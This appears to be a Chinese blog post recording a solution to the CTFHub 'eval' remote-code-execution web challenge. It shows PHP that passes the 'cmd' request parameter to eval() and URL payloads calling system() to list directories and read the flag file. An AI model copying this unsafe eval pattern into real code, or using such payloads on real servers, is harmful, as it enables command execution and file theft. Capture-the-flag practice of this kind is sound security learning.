CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
炽烈小老头3 分钟前
【 每天学习一点算法 2025/12/12】回文链表
学习·算法·链表
全栈陈序员22 分钟前
【Python】基础语法入门(十五)——标准库精选:提升效率的内置工具箱
开发语言·人工智能·python·学习
阿蒙Amon25 分钟前
JavaScript学习笔记:4.循环与迭代
javascript·笔记·学习
喵了meme34 分钟前
Linux学习日记19:线程同步与互斥锁
java·jvm·学习
暗之星瞳40 分钟前
python爬虫学习——1
爬虫·python·学习
TL滕1 小时前
从0开始学算法——第十四天(数组与搜索)
数据结构·笔记·学习·算法
派大鑫wink1 小时前
网络工程师入门学习第二篇:TCP/IP协议与路由协议深入
网络·学习·tcp/ip
AI360labs_atyun2 小时前
呼吸疾病+AI,人工智能正在改变慢病治疗
人工智能·科技·学习·ai
NaturalHarmonia2 小时前
【Go】sync package官方示例代码学习
开发语言·学习·golang
testpassportcn2 小时前
CompTIA A+ 220-1201 認證介紹|最新版本 A+ Core 1 220-1201 考試完整指南
网络·学习·改行学it
热门推荐
01GitHub 镜像站点02【AutoGLM部署】本地私有化部署AI手机Agent03UV安装并设置国内源04【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)05Open-AutoGLM Windows 安装部署教程06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser08Linux下V2Ray安装配置指南09BongoCat - 跨平台键盘猫动画工具10Windows 11 官方系统安装与重装完整教程(2025年最新版)